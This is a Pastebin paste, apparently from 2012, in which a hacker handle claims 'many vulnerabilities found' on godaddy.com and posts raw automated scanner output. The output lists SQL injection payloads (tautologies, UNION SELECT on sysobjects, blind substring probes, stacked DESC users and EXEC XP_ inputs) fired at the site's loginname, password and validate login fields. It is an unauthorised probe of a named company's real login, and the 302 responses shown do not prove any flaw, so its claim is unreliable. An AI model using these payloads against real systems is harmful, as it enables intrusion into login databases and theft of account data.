SHARE
TWEET

http://www.godaddy.com/ many vulnerabilities found by: @A

a guest Sep 11th, 2012 8,420 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. http://www.godaddy.com/
  2.  
  3. many vulnerabilities found
  4.  
  5. by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r
  6.  
  7.  
  8.  
  9. SQL Injection String Tests Summary (43860 results recorded)
  10. Failures:      
  11. 51
  12. Warnings:      
  13. 0
  14. Passes:
  15. 43809
  16. SQL Injection String Test Results
  17. loginname
  18. Submitted Form State:
  19.  
  20.     password:
  21.     validate: 1
  22.  
  23. Results:
  24. Server Status Code: 302 Found
  25. Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
  26. Server Status Code: 302 Found
  27. Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
  28. Server Status Code: 302 Found
  29. Tested value: 1' OR '1'='1
  30. Server Status Code: 302 Found
  31. Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
  32. Server Status Code: 302 Found
  33. Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
  34. Server Status Code: 302 Found
  35. Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
  36. Server Status Code: 302 Found
  37. Tested value: ' OR username IS NOT NULL OR username = '
  38. Server Status Code: 302 Found
  39. Tested value: 1' AND non_existant_table = '1
  40. Server Status Code: 302 Found
  41. Tested value: 1'1
  42. Server Status Code: 302 Found
  43. Tested value: '; DESC users; --
  44. Server Status Code: 302 Found
  45. Tested value: 1 AND USER_NAME() = 'dbo'
  46. Server Status Code: 302 Found
  47. Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  48. Server Status Code: 302 Found
  49. Tested value: 1 AND 1=1
  50. Server Status Code: 302 Found
  51. Tested value: 1 EXEC XP_
  52. Server Status Code: 302 Found
  53. Tested value: 1'1
  54. Server Status Code: 302 Found
  55. Tested value: 1' OR '1'='1
  56. Server Status Code: 302 Found
  57. Tested value: 1 OR 1=1
  58.  
  59. password
  60. Submitted Form State:
  61.  
  62.     loginname:
  63.     validate: 1
  64.  
  65. Results:
  66. Server Status Code: 302 Found
  67. Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
  68. Server Status Code: 302 Found
  69. Tested value: 1' OR '1'='1
  70. Server Status Code: 302 Found
  71. Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
  72. Server Status Code: 302 Found
  73. Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
  74. Server Status Code: 302 Found
  75. Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
  76. Server Status Code: 302 Found
  77. Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
  78. Server Status Code: 302 Found
  79. Tested value: ' OR username IS NOT NULL OR username = '
  80. Server Status Code: 302 Found
  81. Tested value: 1' AND non_existant_table = '1
  82. Server Status Code: 302 Found
  83. Tested value: 1'1
  84. Server Status Code: 302 Found
  85. Tested value: '; DESC users; --
  86. Server Status Code: 302 Found
  87. Tested value: 1 AND USER_NAME() = 'dbo'
  88. Server Status Code: 302 Found
  89. Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  90. Server Status Code: 302 Found
  91. Tested value: 1 AND 1=1
  92. Server Status Code: 302 Found
  93. Tested value: 1 EXEC XP_
  94. Server Status Code: 302 Found
  95. Tested value: 1'1
  96. Server Status Code: 302 Found
  97. Tested value: 1' OR '1'='1
  98. Server Status Code: 302 Found
  99. Tested value: 1 OR 1=1
  100.  
  101. validate
  102. Submitted Form State:
  103.  
  104.     loginname:
  105.     password:
  106.  
  107. Results:
  108. Server Status Code: 302 Found
  109. Tested value: &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
  110. Server Status Code: 302 Found
  111. Tested value: 1' OR '1'='1
  112. Server Status Code: 302 Found
  113. Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
  114. Server Status Code: 302 Found
  115. Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
  116. Server Status Code: 302 Found
  117. Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
  118. Server Status Code: 302 Found
  119. Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
  120. Server Status Code: 302 Found
  121. Tested value: ' OR username IS NOT NULL OR username = '
  122. Server Status Code: 302 Found
  123. Tested value: 1' AND non_existant_table = '1
  124. Server Status Code: 302 Found
  125. Tested value: 1'1
  126. Server Status Code: 302 Found
  127. Tested value: '; DESC users; --
  128. Server Status Code: 302 Found
  129. Tested value: 1 AND USER_NAME() = 'dbo'
  130. Server Status Code: 302 Found
  131. Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  132. Server Status Code: 302 Found
  133. Tested value: 1 AND 1=1
  134. Server Status Code: 302 Found
  135. Tested value: 1 EXEC XP_
  136. Server Status Code: 302 Found
  137. Tested value: 1'1
  138. Server Status Code: 302 Found
  139. Tested value: 1' OR '1'='1
  140. Server Status Code: 302 Found
  141. Tested value: 1 OR 1=1
  142.  
  143. http://www.godaddy.com/
  144.  
  145. many vulnerabilities found
  146.  
  147. by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top